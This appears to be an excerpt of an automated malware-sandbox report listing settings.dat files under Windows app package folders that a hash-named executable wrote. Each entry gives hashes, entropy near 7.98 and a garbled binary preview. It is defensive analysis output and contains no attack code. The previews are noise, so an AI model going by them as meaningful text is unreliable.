                  Preview:regf..(...Q\....k.C.7..$...4..R....!_B<.uY....,...!..1N..t.k.$..7ga_...2........X........F.a..}.xQm[[.D.F.\$.|...A.....a... .r...].X...s.w..%...=1M.rT..K.?......J....9C.q,3.q...-.:.Szp....D..@.Xg~].'E.B}..VI$2d,.u..B. ...r.V.....&8.....U....D.(.g.....C.K~..Y.g...Y......1g,.)-o....d]...r[....ux.U6..j)L..b...L+c........@wKnw./.I...g..M#.....]......]....o}*9..9iu50..z\....]...8.u..V.f.....b#Y..A.;N=.c..=.T....oaP.......sas7.Y....{.3n....e...&R.8r..g3n....}...x..... FB.U=.:....yY..)9i..b.7..].9..........-...e.oc...$..L,?.o.f.....v.g .[Z...#.r0.p.......&...73.Zm.$..7.+E..jc..u,.t.+<GE...d.........DWj...{....l.J.... ...!.~..a.......~^/.'.~Lr.(...a.~.S....c7.%..p`.8|.Wd.DI....0.$....c..z.2.r.^.........R...F...4.......F.9(./.m...c...c...:6R.....d.:Jt.A....`.s..w..S.C...Q..}.K....<..Z....=.I.2\.xq..........X .y)(...."......,.qdA.UV.8..e...M..g40M..Q..p.H..[o.D.gk...0.......c.^...4.Gh...=.%......A.?.....F....6X.Q..".i....w...TEL....X.w.u..9....

                  C:\Users\user\AppData\Local\Packages\Microsoft.People_8wekyb3d8bbwe\Settings\settings.dat

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.975399973039327
                  Encrypted:false
                  SSDEEP:192:oTkLr39Nw6pK8S3asD4EhhsZ672KbV2P+1waqBf2:oTw9CH8vshhhsZ6aKv1qo
                  MD5:1DB477CE572A47CE5BBB61981D7491C3
                  SHA1:4598BA0781ED94FCE9A01E773A2CAEB5A0BE3072
                  SHA-256:D85DC290461C1C1B553735727BAECF34F3C7B773AC0E1804DA1096EC51B829E0
                  SHA-512:94B74565C4A3A3F4BE48F0CF4D3D2BAD473963522B0C3879FD7E1FDA3ED1CD23E2CA5579B7DAC92351490F8F0E29FBB9815EB70928A3127EFE5921724FEC92E8
                  Malicious:false
                  Preview:regf.._Z.....l.w.]..:..i.!...`..Js...C...Y.d `...Qb..9..QM.P.QM6~'d.s.......q`.X|).5.S.....<....A.....&B.......W...e6}U...$..^pcY+^*.....6..8..J......u.Qa..T .1,q.X..1..v0.Z.`..d..@.../........b...7..rnF.V.Q.PoI@.h-^.L.y.S..D..............?hl..a]..b%.....,........<..MP....Pq..I.LJ.c... ..~../&....f.#..G7.;Y..#.x.6.$/.7...z.*&...R..?.\.~Q...qUo.J.i[.....x...4.7.Y.M.)....Jc..W..I.E..>.j.a...Y..........pt_U...t....8BO.J!<..4. cu[.....o..q/..B.ww..iR.t$.CtJQZ....YSC.>c...z^NH../.9...D.E...NOX.'...7...J...h./.....".v.pN..E3..=.X..........^..5..~.8N...Ev..D..D.9.F....R..E.4.`.>jW)..."..^c.D.{....>..J`^;.H.V...XP......k.n.=..w&.).......p..._aoy.D..R5...I..PD.\.....#.....J....-....P.K.....*.....| 4""$...Mv....-..t8.......#.....IO..No..N.r}.o.;...U.Jo..$.Yo...e...>.U..`..+Nh.M......HB.7X.~......f...Q.6.AL..B......w...E.C1b.A.........r...l..rV.....n.(5...$.........g...GwF.y...Q...3...u..)k.#.5.{SD...6~8....}.(.Pr.0~.^@..ae..W.2t.7....DF...E.R.p^.I.

                  C:\Users\user\AppData\Local\Packages\Microsoft.ScreenSketch_8wekyb3d8bbwe\Settings\settings.dat

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.977505086971052
                  Encrypted:false
                  SSDEEP:192:NcMH48uatgiZn3rhNc6q3lutvlzitEo3GfjrzCBbtioQRS:Fug7jN9qVS9zfo3MuBQa
                  MD5:9D09A5C88992DB4870147645F2581801
                  SHA1:13DAB35ED6B5BDF1306CD653E00C319F167D692B
                  SHA-256:1D278D8FFA47D323BC7F97071AE72588216444877100DA4DE668F483FA7D505C
                  SHA-512:1DFAB5FDE5E01BFB3CA144C804E3DC15FB67F61137B022826EF9E4391AF733C6518C497D5857E44D2CEBCE1FB2FD13508871B642132E8DE2AF57F8B6391FB7EE
                  Malicious:false
                  Preview:regf..E.....y....dPn..D.(.F......7..#..W}}...7.}.oVQ.8...g.BR..W....^.[.._........fc.H.M...C..%...H2&.\z...~y....]..P0.%O..R.-(.......AC...{h..]....].........'2..&......N...r.3L...{9Y...Z.....5....a..3RA.....T"#J...iLf.k.|.f....U...eyQ.4C.=....jsk...B4D.x...i..X.?.%.YF.v.y.~......9pUdC.+..<...|f.?.S.5X......!:..$!..6, io.Y?..$.....bC6.O.....Z.m.'"*....Q..7./=:..P*^._].J..s.....iISL..X.A....K.t.f/..>E...sjj..{.......VW'1............Ue......|.....Q6.e..=.R..../..J.`V...D.8.u.2.E..].....e....uQ.(..../..~....N...*..C5._.....yY...H...{K.#.h........|......W. ....} @K.p6....&.d..l..f:_.P.1..E.]_...O..D...z).p.........o8^.....".. ..._..._/....?.xHK(.$..m...=....>..E....f....J.$p.[)],..../.._..w.EC-.!5o....5|2&..N .)..BJ..'..?..9Z...7?.1...?ku&l..`.z.\..%.Ir.}..$...N...U..{e..Q.?..zY.$A.+.X?y.....o]#..5.D.".....nj.Zv..w.....~....8Q......"....+.Tr*L..O.L..:ep,.12.A4l.fZ...:..\...a.g...+st..J..G.!...j.+c.....3l.>..k.>....4...m.;..&8`K...A@'..!.

                  C:\Users\user\AppData\Local\Packages\Microsoft.SkypeApp_kzf8qxf38zg5c\Settings\settings.dat

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.97793626434428
                  Encrypted:false
                  SSDEEP:192:Ucjwwl0NiZcD9/LynY9yIJBoAO8pgl2JdRD3vt3OA/:UkwwlgDyYtJBn5gl2JdRD3J
                  MD5:76C956926E9129279E8E660CA042598D
                  SHA1:D0E6A8146BB1432AE7A79C1C4E136073496187BF
                  SHA-256:8CD6411351BA3C28BACFA7A2147D5BBB27FA13774512EF16FEC4D4D8213B6E82
                  SHA-512:8A95B27D036933971D8387FA22B5F26B0ED216D1EA8BF5E9465F13771AA4E40EB72D86C5F343A18E86512C50E64989FF3BC0B31BF35B8B2ED73ECCEAE589067B
                  Malicious:false
                  Preview:regf.<..R..O..;..'..#?#s.L..aG..e=..^...q..I....j-...~..........4~.j.))z.B#"......_+.F....G.....e?....1.0.Q.t[..M.C..sM.`..:<(...E...aI.Wo$-.."RP.+....%..'..!p*..f.x.$....;... r...fa.}..L6..0.-&.K#.-.... .6..7i......3!...Co@L.3..........*..j:M..p........e,E..../).A.C.,..4of.M.qp.5.=A...Iu.C..&e..x4.4h .~@m.iu.....,..46.A..g.P...I.R...5VZ...9.....Kc.(..]%.+p.x.tY.xb.p..".6s\.0.....e5..`..&....r...`.t.B....%Z{..I{*.=RB......a.a.....@IxuY8..(..O!..F..L.1>...U'lk...Rp......k5....O...o....C.2Q....|...B.:.2b....Ag...c.).k...!...?0....J^...1...t..4..U....Vb..,.H.lI4..k#.J@p..d......b{x{2xQ.2.*.:..5\....UG...=..bK..;..9..C.0...B]N...QX4...B..g.k.1.!I....N&x..HS.f.........Y..B8. .r..[.(Kd...h...r.3......u...y.KQ.[j.....Rj..4+#.8....O.@.Ib.....^......N...S...8.t...Mqn{..L_.C...(.*.I.s2..."...RA..L..m!...f.Fp~.i T.\.l%.mM.....?..r....(.S.km..h...J.T......3...^&w..U.Z*d..O.j_.%....XI.... .-Oa..I.A.1..qW.<5M...#...U.......g..v.......&9<\.\W.|=...`....

                  C:\Users\user\AppData\Local\Packages\Microsoft.StorePurchaseApp_8wekyb3d8bbwe\Settings\settings.dat

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.980263770969813
                  Encrypted:false
                  SSDEEP:192:b6m6P0ZdQlnwvlmrPpY/bpIcOL1mLruqbGK:by8ZShnpYVzO0tp
                  MD5:0D217E4FB3E9959A8A67D5665A4F5127
                  SHA1:2CB13C0799ACF9B067402E81F57F1478F9172E58
                  SHA-256:D8A431D82FC3AB0A5022519FA67563526CC9B72FCFE6FB4C25DCF5C21B3CAC89
                  SHA-512:15A261EDFE582BBC6BB61394F1DF378A2C5F30274B1EEDAFF3A5680711A21F3BEAD3BD814FD2B42F8266E60C7B308CA8A0AB01D87C7690DC459287C704A017D9
                  Malicious:false
                  Preview:regf.WyQ..u....Ux.(...^.;..?....U....Wds...\_.&..-...."H.w..Y.p7..............W%...../..b.i^.]P9:^........$.h.9.q.2..R.&E..9.*.Ja....,.e$~T...0!>...M...(c.a..{....N.....(.Z,k..Q......b7..KK.$4..w...V4.Y.,.-.....0....5.........0.:M.-kqR.uE......f/o...^...%Y......i5.*.:.!..!K......).+.F\N8.].U.c&.\?|.25.8..F......E..{/l.AZ..les..y.....(^..07p@;[!..R.X.+....'f...+.d.$...O.fP.....1...9..A....i.t..e...K.....7.7.}..J.vO..O.u..s......5._.....<.qS...'...{V. ..l...eB...+:.q.Y..d8...e... C..8..........GvU..$.is.....3W.....Z.v...mH.k.ms[&o... ....f.;.\.u!.(..0.J...o&.9.?t.../1./.q.R.@.)..%..M..\......O.,.mQHivIf!Q~r2..".ud...y.....^EN.J..Mfy.E................Q..$.....}.'..J..G)........<Mas.X.8.Y5R.......?h.\.H/.P.@.]..y...p.m|...m..........?........(...lJ...(O...B.S... /fTS.P....a.tK...-.{B...S..Z.BP........>.....9N..,.{.....h.u_..Rn....1... C.>......T)..n[!.}b..R...DE...1n.w/...3/....'f.%K....a.@*..K..N$..t...7.p5..FB?..L_..w.&......./..D..Z..U.o..

                  C:\Users\user\AppData\Local\Packages\Microsoft.VP9VideoExtensions_8wekyb3d8bbwe\Settings\settings.dat

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.981348485038577
                  Encrypted:false
                  SSDEEP:192:h64KjzqhsE4C4vlcKe7D03C/OKGf+t1LrlssnQPn:s4K9Ll7eKqOyRnWn
                  MD5:AD9147C7C144AA6B49B476DECA2F7AC5
                  SHA1:2482CD2328E4604847CFF0548FEC74F9280C038B
                  SHA-256:F9EC6160D78519B651BD66D95B486D7868AF85BCFC12AB2B9DB2EEAC16EE6EAD
                  SHA-512:1B77302055FC9E30ED7F6FD5FF061A4F62F947C001BBCD1F7344AF336287433238A62B1BC47874C79C2DA726F11370C1C0923B62FB0A029DDDCB9859A2B5993C
                  Malicious:false
                  Preview:regf...29.'M.>.q..A~g.p.5u4..............k...Ab.>.....e0....).||'..{..j.[..@...@...\m..@....%..|[.... K.HO..x+.)F.3...T.....\)....X..{.Q...9..-....a..b.).QV.Hb....6b.............e...K..<E.A98..H....).....n.c.Z..5y..R.c...++..o..._*"....1.k.>7.0E.X.~vN..).9....u.H._..\.F.A...Y./...z.\....5R'SA.3....O...L+.....L..N#a.*.0..a.p jR...Cgp..UC.z5..".ti....i..=A7.....G..._F!cn?..b.BYHg.^f.C...d.X....5...G...... .~....9.K.|..d .?...^x.+...n$F-U..;.=..dA....f....r\-........G..|{*.<.y,.._.Q.......-..g..1..$...,V....$..Z...=@....4a...Y.].R..|PW..'.CO..chn....@....6.....N.NtG.....wo.....0?.G....$UH...C>.y.l.@ ..~.4F......Hv2.P.2..[S.+-S#...~........8|.E.v|iv!.1.....pI.....=.l..T..(@..S.s8..@...f.4.*.T...opbJ..[.....S.|o...%.....L..................J.2i<...k.1..&tF0..$4;..PM..JP....i.n.H..I7.IZ.`....rx....a;9..}...K,T.N.y.FD.....[[-..0...;p.))..3...U.<w1.U.t.....Yi..T.-..d.........~.'B.y>wij.[.kK..W.K...h..{.H....D..>..WT..."..$.s.C.Q.=..l..#..8E.6![..q..JF..y.

                  C:\Users\user\AppData\Local\Packages\Microsoft.Wallet_8wekyb3d8bbwe\Settings\settings.dat

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.97592109461935
                  Encrypted:false
                  SSDEEP:192:vEIuv3WMiqP25ryXTyDonpHChuQVEsCr0x99DvVFtA/L5LM2ukHXFDQiFz/:vEVTn0BDopi8QVEe9RHtAj9umFlFz/
                  MD5:D5691182D3F4E8289EBBEC1A6DF369C1
                  SHA1:25F5755374959B0F59B6FC74EA3D94D00667F3D6
                  SHA-256:60536866F4DAE6ED4DFE506EBF382B4A54AF2E4F81443D42228F775001DE203E
                  SHA-512:ECCE9C05B0A7875EFB7CB9592A99D2F5B138067F59877E1029B59BF5F2CE8F77C7C269138C3F874422E3EC34B34FD994161448A56713F4E8E641AF49FE003A28
                  Malicious:false
                  Preview:regf..N..i8..H:.^...q..=.f...a.3...u.$F."\..4bg.<C#.T.c......q..B..........ko(Xls..3....N`~.......k;{...}......sl.*..FIJ3....m.q....h._.$.+.....kCI......;...[.7..4.D.....x.V.....I...!>.*..-.j...9dUZ..YS.......IZ.......:.l...s...y.M...@.......h......SX..m..*6...k...r...U.3..ZqkX.ET.Q.~.....].....~u*S2M9..;.5.@.......q...j..*%b...b..o......c..V.2&........S...U..9S....F:..r;..sk....*.."{'....{....T......+[....:.Z.t....D.9E..L.6.dy... .0].}....T.V..l'...\..i.`/.Q+..jQs...(.Y....z..Q.b.".!3.....7..QV........O{_.H<Gl..w..c...&.7a...M....$z..i../.W.oA.9.bD..Y4.Z8......\K.aL....=.@...k.J1.i....W7.3..B.%N...].."Dv.l3..p..!;.....#.*X.....s?.R...JR..I.Z...K....cm Os.......T[x...Q.T.6.`...sJOi.4P_.1.7sb...._..[......:...r..:2=...8Y..>.9.E...c.\+5<.e"..C...cg9W....*M.?D$..1.Y..*...@.B.......,..sP...4..6.....$e..{........"x..V..R.uzq.....|.....YZ&e.-....[sc...A..+...y.....b.j.."w...e...(..,.../).T_...O.{..lU.....(..x.5..y".:K:B.A1..a7.......Z..C..$.

                  C:\Users\user\AppData\Local\Packages\Microsoft.WebMediaExtensions_8wekyb3d8bbwe\Settings\settings.dat

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.979011177767126
                  Encrypted:false
                  SSDEEP:192:zRLSqbSlBIG0TYyyE6zXTdX5XufM51O8GMvqfQSCi6TBeBfo:IqbSB0P/6rzR1O8G4qf8TBqw
                  MD5:8AA5D4FECDA63EC21C96FB2ECC069881
                  SHA1:A5CDCE624B085213DD0AD1079CD5DA506C79103F
                  SHA-256:0778895CD7FE295D1402DC119E344262FA8F1D254B57DA250F1C89488A489200
                  SHA-512:12BE0DCED0239DA6282040C89B5F36DD8AB91AFA29259E25C854EDF167D1039FD775D8A54B6E05E8F901B0F33C8FE7369F76C30DFF4F1875C355C023657DE568
                  Malicious:false
                  Preview:regf...0yR{)4T.C....W..e....K..3.....|...slUf....s.c.q<H..X.C.P>...Ip.h%jd'2.B:.h.....]\;.F`..:.y5.s...X......T....z.ww..A.....lH....[...R0...+.b...W.eH]w....+wy.|.R........L..C...=.......k.'>z(3...s..........'.[F.pM....p...N)6.}.._...M.."...\}_..J.s{)..u.}(L:..W1d^....;...of.^5!.....,...B..U.4#..U7..Hv..u...|.......4Y|[..L....D.b.VA.()2..P..L..5.9B~.*Q..V. ..*ZP.QK.H......(D.\$.SI.....+.C..l...47.X..0..%..z._g.D......P.%so..5.MN......p.....t.n.V0.8../rC...$..r...).D...).ltbL..Z...k]....88.u~-. ".RC....}Q..0....s.S...K;...~....B...Z.(..9...f3..X..R...J..v.8.,z....h7..h.u.....&......u.....#".....*J..y.......O.-...w.....h'G.D..E....YuTz.......%}..N..4.i....3T.V.XI)'>....%........E........cN&.TR.....+.}U...a[r'.L*!c@.........x.c.*.r....\..C's.x....:..6vD.}.Z.7..C...9..vH'n._...%.:.uo4a....\..J.....|}m...#).^n..[Q..xl.....N..\.#{.r.!...T.q@..V#.$3..g..bM..........0.H.l.....r.O.....FQ...E..;m...}.?M.)...PZ..._.|...%..%zJnd(.n.b...=.!.ghy.j;

                  C:\Users\user\AppData\Local\Packages\Microsoft.WebpImageExtension_8wekyb3d8bbwe\Settings\settings.dat

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.977030532794147
                  Encrypted:false
                  SSDEEP:192:X+GbnIR5tR8Pk4SCV37EaMXmDpXtAtkFL/lC:X+GbI1mPkVq5MXmwkFrlC
                  MD5:5F5B243FBE83EC5A1C012600CFF84C65
                  SHA1:ACBC312E0409E1F4AAD8D96E568187FA4034D1FA
                  SHA-256:3DD8ED69D3217D2B97FC76F5A7A9709BEF137EBAD4B1BE7A7960687C1836F470
                  SHA-512:E4974E1EEC8AFAA831E7118DD8CE390FE4A878E6C0F0057964A28AA1DF1DE05B0FB54B261AA3B15919B003A8B9ECABF9A713C52871C932317CB39D26D036C2D4
                  Malicious:false
                  Preview:regf.[P.)..\....0...&..F...._D....Ua...|..._.E...z.s.@.o9...d..~.$N..yd..E2z.....?..HB..N.+..vw...Sz]D0wj...v.U..s...5..I.".F(..8...\yV.oc..R....G.....?8f..$..x.. . ..M.8f(.h...Sf...5..q[.....P`.Fz.9..p[.....y.1.e.8`C...........VL..e.....K..G...k...J...G..j..k.[.z.\._.:...'...4..........=...f=..\*0.......L..!.I....$.#....,....B...z..P.......x.x?..--..WN...,..m..M..1%.].o....IIl2.e#..L8s..$.;....B+...I..'..h.z.p....w...b..%.m=..).4....6.I$...>P...{.?O.\...sh...N9X.P.F'z..Z..km.....n)..0.Bh3L.UL.K..........^.....U.]...X....;8.B.?...>.Y...S..R..0.3.>7f3.[[:C.....@}...;...#..X.C;.K.....nD.\9..^j._..F1r...5'.S..O ...N1[....Z..z.[...I[.4.....)E%b.L.w'..#.f..Wq...nK.W..R.frp......aytG..1..1......5.].`r.]q..9is.\8e...{g..E[.....d..g.$:W.>...7.%.w..s[Sh<,...rO>...N.c....[B.&M.@.H(....2......].J.hG.]8.F..;!00$..)(u..%...`...{....7G.....F>..n...\;lp<..\.......e..2....T.....$*t..[.]j$...M9...U..........P z."a2@..P..l.2.~...K/.NC.+...6.sv .....@......

                  C:\Users\user\AppData\Local\Packages\Microsoft.Win32WebViewHost_cw5n1h2txyewy\Settings\settings.dat

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.9796421144124245
                  Encrypted:false
                  SSDEEP:192:BEzhPIl/1FT98I58qU+NQTusSD+cnfZkF6+n:Ozhg4VqEcnf26m
                  MD5:C73DB189EFCB51452B717F670864B7E7
                  SHA1:8AE59783257F0F1DAF16690C18CD0D0BA58FC109
                  SHA-256:69F687F22C96656E08B369972780BEF590787E4A79DE6198272C7515E1A3C450
                  SHA-512:696DBCB2C759A9362A06C7B17E9B5429A747620BC052D18B622FC2975A7AC656DC7AB85F7FD75612FF91B83482D9D1A1760103003E8D68AA898A6A6BEA52E2BC
                  Malicious:false
                  Preview:regf...Y...z'..\GD]..(..L"..........!....x..K.<........1mTR..).O@fR..$2.........'Y|..?.w"..&..NM..`W..._.4...>."l0.7.0v'5eu....Kr..s....P...+xF...S^....4A..V...6.?...F...r...kB.{.......r.s.}...>.....O.._.Y..=1...,..z..!.M.....@........E.&..y.*..............|A=.h.|.G!}2.......2...j...........I|.2..9.C...v:.].T8H.....%.%[..a.y........R.X.@...Z9A.ZV8.-..t.:.`....jnN*.\...!G..~x~...gs$.......t"..\H..Hu.....],..b,z.......j..cso.X..~..8.QR.`..W/....I)L..s.NF..R}-{.?..8'.aY...`9..WP...[F.|......O...]?.{.T.s........i.WH.v#D.LX.&.$.H.ja!.6........C.A.9.W.g.v...YzQ.v?..-.gR.,.....u....Ko.4c.@Q.5.Z.m..q..y..M.2..~q=.1V.J........#R.D..X.L...8./..'.}U.....7.]..c.K.B...."...7DaxDU..P...4m..R#......p......c.%.9;...9"M.J..5U..~..$../.\.`.8...v..Y[. p.....O....E../:.S.;....X.la-.g.T..*..V.>. .vq.Tu.....]...p.K_F.,O....<...u`.W.[9X.A.E.g..sC.oP^6.hhUz7..........*O.o..3...L..o....V[....Q/F.Qf..B...[....@h...~[...._r....*...K....d.....ic.[[.uF

                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy\Settings\settings.dat

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.976283379396324
                  Encrypted:false
                  SSDEEP:192:ikN6s5zPkfcyPs48kP+9TPQ49pJ/td10ZRWDL2ZSTL2:iATPkfcyPvJParNJ1IWDLL32
                  MD5:22CF57BF665801D8E7FCF14D6580BE27
                  SHA1:4E7F253A77E5B3047AA0D5B20B22F7EC29CFCA7A
                  SHA-256:0E7C88A0B89491D934DE10F3DD5552FCC528E3BDC9A74AD9B57F8B8049175720
                  SHA-512:4C1EE7A58F0D2394AD3659CF51D9A74048DB64C93FE3AE03D2A0FD37635693415E252FA21D8CECE726BB53E17AAB7461EC419810E061C0451076ED7EC4BA13BA
                  Malicious:false
                  Preview:regf...)...1......`R.O.e:cj.[."..CI.D4.......~.Gk...-...~x...~.^..2..}m.. .S.....9...=AUE....$Rl.o.....ka..`.W].(. ~aS..X.8g...{.|...2\.+.Y.t..&X.0.#...f.._..(k...{.2.y...............[........DX.v,....s..}.;......t*..Y.....#...B.Lw..N^...Q.:-..x.po.N.K.9....G..i.x...........k>0^.,......E.\{.....:..Y.|.p.C.._]....4..jP9..h2.....*.....<.{..c...4TjF.....(..k..>vCxz..C...,*..jc3j.=..D[.y........q.2..N...F4.=$.).{w.B...T.85...DP.....=o.,..^w...C.9.R9...."........&z..b...Y.v.!...J.C|......%.B.L.....?Z..v.g.]..'t.\..F.#...Ns.....g.].D. .1(|..O.CD......._.>,*L.]....X0...w.......[..L.d?u.V.L.0....@.9..E.Z........0.N~.:"...WV3....S.y_9..})AiHy..S.MQRL.o..}...z..v.t..s.e...Q...V.P.<o.W#....FT....a.23.....l-.7......l.....!..}t8.r...W.?..?D.'..hL']5.@.&.Z|{.R>.u..'.6....)Y.b2.R.!7._.4.........:+......I...f;..~>.WOa..%>.;N...tJ.. ../....j`Z.Dm...$t$G...7-.........c..i-F...%....X.J..+r-$sgw`C..P...Y.Qa}B.......l...iJ.k.....e*...&%......D....f....4*

                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\Settings\settings.dat

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.9788671059923715
                  Encrypted:false
                  SSDEEP:192:tLjhdI2lsB3Y1Q6Maa0AkuWE5w2wqQN3RhbZ6LaeJEhSpTrG8BY+:l3I2/1Q6Zef5wjBhZZeCcHVBY+
                  MD5:1A8A3BB071059E2818065793733F3087
                  SHA1:391002ED0F232115912426BD985C7F778E16263E
                  SHA-256:BE9D185F27893EE48B63BE91E20FF86424BF69A71487D09C8FBA2F21E2DCE757
                  SHA-512:CAAC54E39707DE3661B2976CADE451C16B2658C0222B693F124D35E8BCD0E0BD7F6EEE3C3186CE8277B561EB320E9D70264F66706A551630E2D19FD60E861E3D
                  Malicious:false
                  Preview:regf.B..\..65.m..?...MO..T>x%..=.O.x.4zxF.Lj.(..so...k..*Q...Z...J9#i6.#"...Y..cy^........;.....5..../r....>#..jh...3...~...........a.#/`.TQ..K,.d.b,.t*..;.E*.z.....*8..+....Q.?....Z.gz...!.....?...^.?.*..3.pB..h.S...V+...a.s.w..L#..A...O._..+bn..i*8.h...~.{r...;.................).O@.~.{..........65Fm.@m.[u...n.v.Gs.@q.{G......PW|.<...-..a`.C.0.......6.]1s.x$E.o..%(...;.*..|"f.u..1..G.B.5.....R.4..y..<...(.d.u.1.-.....:.tJ$.%...J@...}...e....&.....;.3w!..%Q..{&..6y.n#.........V.6J.L....?.......lUY...1_..?.;.\G<.m^R...*..w?_.TIv..,.O!..Vy...zeD..k.w.I.......,..m.Z.U..J.._Vj.....0..\..d.....n..."$I.k...C..^...}n.w..b.DD..o..rC..].s.kG.5.-Q..}.9..-ko..)..1..O..1..8,..#...?.(.D.o....G.Bn..a{.Lc..%i.kHMt\..Q...!.....G.4....4^|.......[m8X~Qg..-.C\;F8....+.?.....MY~.....O.~...|..EjF...Xf..-.N.....6......\.[.t..uu2..$.]..nf......yS..F......X..#=..|.^.#.M-......i.u.vz..w.Y.K(N.I..r.....<.PS. o.... ..vx^m.RE...cL../uo.y.....y..q.d..hfK.

                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CallingShellApp_cw5n1h2txyewy\Settings\settings.dat

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.977075592989119
                  Encrypted:false
                  SSDEEP:192:miv7RGH4YATYxy32Fv7EEykRBvvtC9TphfN/JAr9vQdrD87v:mu7OATsyYQkV6/F/JAydrY7v
                  MD5:A8B366D0CF92DDB547BC1821CD7C3DDC
                  SHA1:17F5A48725D02B09953277B1BB95592BA9475DEC
                  SHA-256:297EF7F2528A8164A9594169CE3D0B60871588A8021D06B77F071E4A97F68EB3
                  SHA-512:1A039123B3D6B128ECEA93A96D49FB0AA6911249E8A31E4B50ECE4724AC51A269AECE177034FC8D30E9AEE4E7D74814C02874F9FDF916A673CF2C7F4B14CAA30
                  Malicious:false
                  Preview:regf.....4.. .b.H.F.Y..:5C.].U......G:..c....9Dj..c.(S..%..X.82..!...+........p.D..-.....-j..P.F..V.E.]....%..7........x..Z.>..Mt.......@.$oA.M....q......n(..}j.....u.B....>.m..\.)4I.$f1(...........).N(4c..n.$-...F..^]...!.xC%.n.........l$..q.....a..!X.J9..![./C.r..]..2.Gb...j!1W.".s.....E!Dm<v.f`..R..6q..7x.Q.*.RID..wA....X.D..:f..(....Eq...;.....l.p..Av.......u...P..{.M=X.,.O....R.....if.K......r....k:&..".-t....9|44....WF.JX.xM....|Wq..~Y...."....F$..yv.c...>0..7m\..-.&..._....b.].]..)..z..V.-6.w.Vce./I..t...!.f...h.3.M.Lg..N...e..!..B1..)..Zd...N.F..*D....|.."9.n....f.8+.......L...'.g...Z.....qh*..R(.My...k...W.....T.o.E.]...?l.s.nnJ.Cf.N?.*.....ko...O..} !.;q..#f.+.[?..dY..>\<..5.N..M...l..%%,..=.v.e...c..%J...BG..C.xO.RS... R......<.Z.....y2U3.'.H......j..1.1D.(.}..].[o'.(......z|.....]x.c.7.&....$a..>...0................vnz9~Q......{ah...........=[.Q.....;...i?^7..]^....)..........G. s^.d....@.w.pZ....;<...\.UP...{.W..

                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CapturePicker_cw5n1h2txyewy\Settings\settings.dat

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.97814107870259
                  Encrypted:false
                  SSDEEP:192:qUJ5PtFVAKeOPac2Z243FX7epPXLRGBgqydLR49ujbBJtsRotVNFwa:RLlFVmOd0x7epPLTqydLR4SbtFtVNWa
                  MD5:984609136F5B502B9FAA26D096D9BA1B
                  SHA1:F8C4CE8C662D5C568B2CE9F2AC2F50C6026AB67B
                  SHA-256:8D3B6407D81546CD678D820DF2C8299AE51B578C07A96369EED3859F78C37100
                  SHA-512:715F040988218F8A7E23D8AB3686277D39AF7BA8E7E22D4AB5C6E3E8C69671D0AD3390744E8F9282CEBF9EC8C5A5DD5DC4173E4AF16EFCA8CD7421BFE44DC97E
                  Malicious:false
